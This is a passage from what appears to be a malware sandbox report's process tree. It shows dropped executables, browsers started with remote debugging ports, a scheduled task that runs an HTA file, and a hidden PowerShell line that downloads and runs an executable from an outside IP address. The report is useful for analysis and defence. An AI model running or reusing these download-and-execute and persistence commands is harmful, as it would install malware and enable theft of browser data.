      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5736
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
        6⤵
        
        PID:5840
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2408 /prefetch:2
        6⤵
        
        PID:4984
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1948 /prefetch:2
        6⤵
        
        PID:4980
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4956 /prefetch:2
        6⤵
        
        PID:1876
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5220 /prefetch:2
        6⤵
        
        PID:2432
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3760
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4216
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
        6⤵
        
        PID:956
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\0riek" & exit
        5⤵
        
        PID:5884
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:5876
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      PID:5668
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 1008
      4⤵
      Program crash
      PID:5644
- - C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
    "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
    3⤵
    PID:6088
- - C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
    3⤵
    PID:5588
- - C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
    "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
    3⤵
    PID:6128
- - C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
    "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
    3⤵
    PID:5492
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:5736
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:6956
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cfa9cc40,0x7ff9cfa9cc4c,0x7ff9cfa9cc58
        6⤵
        
        PID:6976
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:6272
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cfa9cc40,0x7ff9cfa9cc4c,0x7ff9cfa9cc58
        6⤵
        
        PID:6348
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1960 /prefetch:2
        6⤵
        
        PID:5220
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1076,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2128 /prefetch:3
        6⤵
        
        PID:5208
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2096,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2272 /prefetch:8
        6⤵
        
        PID:6944
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3212 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6704
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3236 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3708
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4516 /prefetch:8
        6⤵
        
        PID:6292
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4620,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4660 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:7120
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4820 /prefetch:8
        6⤵
        
        PID:6080
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4784,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4960 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5732
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4272,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3612 /prefetch:8
        6⤵
        
        PID:5888
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4276,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5260 /prefetch:8
        6⤵
        
        PID:2276
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5388,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5400 /prefetch:8
        6⤵
        
        PID:780
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5232,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4288 /prefetch:8
        6⤵
        
        PID:6460
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4888,i,14258769863781198021,5794947050856728816,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4908 /prefetch:8
        6⤵
        
        PID:5300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:4776
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9cd643cb8,0x7ff9cd643cc8,0x7ff9cd643cd8
        6⤵
        
        PID:5656
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
        6⤵
        
        PID:196
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
        6⤵
        
        PID:4176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
        6⤵
        
        PID:4984
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5772
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6808
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
        6⤵
        
        PID:488
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2488 /prefetch:2
        6⤵
        
        PID:5492
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2132 /prefetch:2
        6⤵
        
        PID:568
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2204 /prefetch:2
        6⤵
        
        PID:6576
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2200 /prefetch:2
        6⤵
        
        PID:7052
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2304 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4652
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1364
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 /prefetch:8
        6⤵
        
        PID:6084
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3912
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1892,1963597906132919687,13911319558627942218,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5756
- - C:\Users\Admin\AppData\Local\Temp\1090366101\dbb9a90635.exe
    "C:\Users\Admin\AppData\Local\Temp\1090366101\dbb9a90635.exe"
    3⤵
    PID:1544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn QdOnMmaKZUR /tr "mshta C:\Users\Admin\AppData\Local\Temp\d806J5UCg.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:2648
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn QdOnMmaKZUR /tr "mshta C:\Users\Admin\AppData\Local\Temp\d806J5UCg.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3008
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\d806J5UCg.hta
      4⤵
      PID:5528
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RAADX3VZGFRZGUIR8MJAQKQHPRTX3RRA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5696
      - C:\Users\Admin\AppData\Local\TempRAADX3VZGFRZGUIR8MJAQKQHPRTX3RRA.EXE
        
        "C:\Users\Admin\AppData\Local\TempRAADX3VZGFRZGUIR8MJAQKQHPRTX3RRA.EXE"
        6⤵
        
        PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" "
    3⤵
    PID:1156
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" any_word
      4⤵
      PID:2276
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        Delays execution with timeout.exe
        
        PID:5688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:3564
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3960
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:5100
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4172
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:3340
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1800
    - - C:\Windows\SysWOW64\schtasks.exe
